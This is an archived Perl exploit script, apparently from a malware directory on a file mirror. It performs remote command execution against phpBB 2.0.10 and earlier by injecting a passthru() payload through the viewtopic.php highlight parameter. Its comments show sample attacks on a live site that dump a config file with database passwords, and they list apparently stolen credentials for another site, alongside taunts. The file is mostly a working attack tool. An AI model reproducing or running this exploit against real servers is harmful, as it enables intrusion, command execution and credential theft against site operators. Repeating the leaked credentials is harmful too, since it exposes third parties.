home *** CD-ROM | disk | FTP | other *** search
/ linuxmafia.com 2016 / linuxmafia.com.tar / linuxmafia.com / pub / linux / malware / santy
Text File  |  2004-12-26  |  6KB  |  147 lines

  1. #!/usr/bin/perl
  2.  
  3. use IO::Socket;
  4.  
  5. ##                     @@@@@@@   @@@  @@@   @@@@@@  @@@  @@@
  6. ##                     @@!  @@@  @@!  @@@  !@@      @@!  @@@
  7. ##                     @!@!!@!   @!@  !@!   !@@!!   @!@!@!@!
  8. ##                     !!: :!!   !!:  !!!      !:!  !!:  !!!
  9. ##                      :   : :   :.:: :   ::.: :    :   : :
  10. ##
  11. ## phpBB <= 2.0.10 remote commands exec exploit
  12. ## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
  13. ## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
  14. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  15. ## example...
  16. ## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
  17. ## The third issue, search highlighting, has been checked by us several times and we can do 
  18. ## nothing with it at all. Again, that particular group admit likewise. In a future release 
  19. ## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our 
  20. ## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to 
  21. ## be cause for an immediate release.
  22. ## heh...
  23. ##
  24. ## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
  25. ## *** CMD: [ ls -la ]
  26. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  27. ##   total 507
  28. ##   drwxr-xr-x   12 dhn      phpbb         896 Oct 13 18:23 .
  29. ##   drwxrwxr-x   19 root     phpbb        1112 Nov 12 15:08 ..
  30. ##   drwxr-xr-x    2 dhn      phpbb         152 Oct 13 18:23 CVS
  31. ##   drwxr-xr-x    3 dhn      phpbb         944 Jul 19 15:17 admin
  32. ##   drwxrwxrwx    5 dhn      phpbb         160 Aug 14 21:19 cache
  33. ##   -rw-r--r--    1 dhn      phpbb       44413 Mar 11  2004 catdb.php
  34. ##   -rw-r--r--    1 dhn      phpbb        5798 Jul 19 15:17 common.php
  35. ##   -rw-r--r--    1 root     root          264 Jul  2 08:05 config.php
  36. ##   drwxr-xr-x    3 dhn      phpbb         136 Jun 24 06:40 db
  37. ##   drwxr-xr-x    3 dhn      phpbb         320 Jul 19 15:17 docs
  38. ##   -rw-r--r--    1 dhn      phpbb         814 Oct 30  2003 extension.inc
  39. ##   -rw-r--r--    1 dhn      phpbb        3646 Jul 10 04:21 faq.php
  40. ##   drwxr-xr-x    2 dhn      phpbb          96 Aug 12 14:59 files
  41. ##   -rw-r--r--    1 dhn      phpbb       45642 Jul 12 12:42 groupcp.php
  42. ##   drwxr-xr-x    7 dhn      phpbb         240 Aug 12 16:22 images
  43. ##   drwxr-xr-x    3 dhn      phpbb        1048 Jul 19 15:17 includes
  44. ##   -rw-r--r--    1 dhn      phpbb       14518 Jul 10 04:21 index.php
  45. ##   drwxr-xr-x   60 dhn      phpbb        2008 Sep 27 01:54 language
  46. ##   -rw-r--r--    1 dhn      phpbb        7481 Jul 19 15:17 login.php
  47. ##   -rw-r--r--    1 dhn      phpbb       12321 Mar  4  2004 memberlist.php
  48. ##   -rw-r--r--    1 dhn      phpbb       37639 Jul 10 04:21 modcp.php
  49. ##   -rw-r--r--    1 dhn      phpbb       45945 Mar 24  2004 mods_manager.php
  50. ##   -rw-r--r--    1 dhn      phpbb       34447 Jul 10 04:21 posting.php
  51. ##   -rw-r--r--    1 dhn      phpbb       72580 Jul 10 04:21 privmsg.php
  52. ##   -rw-r--r--    1 dhn      phpbb        4190 Jul 12 12:42 profile.php
  53. ##   -rw-r--r--    1 dhn      phpbb       16276 Oct 13 18:23 rules.php
  54. ##   -rw-r--r--    1 dhn      phpbb       42694 Jul 19 15:17 search.php
  55. ##   drwxr-xr-x    4 dhn      phpbb         136 Jun 24 06:41 templates
  56. ##   -rw-r--r--    1 dhn      phpbb       23151 Mar 13  2004 viewforum.php
  57. ##   -rw-r--r--    1 dhn      phpbb        7237 Jul 10 04:21 viewonline.php
  58. ##   -rw-r--r--    1 dhn      phpbb       45151 Jul 10 04:21 viewtopic.php
  59. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  60. ## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
  61. ## *** CMD: [ cat config.php ]
  62. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  63. ##   $dbms = "mysql";
  64. ##   $dbhost = "localhost";
  65. ##   $dbname = "phpbb";
  66. ##   $dbuser = "phpbb";
  67. ##   $dbpasswd = "phpBB_R0cKs";
  68. ##   $table_prefix = "phpbb_";
  69. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  70. ## rocksss.... 
  71. ##
  72. ## P.S. this code public after phpbb.com was defaced by really stupid man with 
  73. ## nickname tristam...
  74. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  75. ## fucking lamaz...
  76. ##
  77. ## ccteam.ru
  78. ## $dbname   = "ccteam_phpbb2";
  79. ## $dbuser   = "ccteam_userphpbb";
  80. ## $dbpasswd = "XCbRsoy1";
  81. ##
  82. ## eat this dude...
  83. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  84.  
  85. if (@ARGV < 4)
  86.  {
  87.  print q(######################################################
  88.      phpBB <=2.0.10 remote command execution exploit
  89.         by RusH security team // www.rst.void.ru
  90. ###########################################################
  91.  usage:
  92.  r57phpbb2010.pl [url] [DIR] [NUM] [CMD]
  93.  params:
  94.   [url] - server url e.g. www.phpbb.com
  95.   [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  96.   [NUM] - number of existing topic
  97.   [CMD] - command for execute e.g. ls or "ls -la" 
  98. ###########################################################
  99.  );   
  100.  exit;
  101.  }
  102.  
  103. $serv  = $ARGV[0];
  104. $dir   = $ARGV[1];
  105. $topic = $ARGV[2];
  106. $cmd   = $ARGV[3];
  107.  
  108. $serv =~ s/(http:\/\/)//eg;
  109. print "*** CMD: [ $cmd ]\r\n";
  110. print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
  111.  
  112. $cmd=~ s/(.*);$/$1/eg;
  113. $cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  114. $topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  115.  
  116. $path  = $dir;
  117. $path .= 'viewtopic.php?t=';
  118. $path .= $topic;
  119. $path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
  120. $path .= $cmd;
  121. $path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
  122. $path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%
  123. 50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
  124.  
  125. $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", 
  126. PeerPort => "80") || die "[-] 
  127. CONNECT FAILED\r\n";
  128.  
  129. print $socket "GET $path HTTP/1.1\n";
  130. print $socket "Host: $serv\n";
  131. print $socket "Accept: */*\n";
  132. print $socket "Connection: close\n\n";
  133.  
  134. $on = 0;
  135.  
  136. while ($answer = <$socket>)
  137. {
  138. if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
  139. if ($on == 1) { print "  $answer"; }
  140. if ($answer =~ /^_START_/) { $on = 1; }
  141. }
  142.  
  143. print "[-] EXPLOIT FAILED\r\n";
  144. print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
  145.  
  146. ### EOF ###
  147.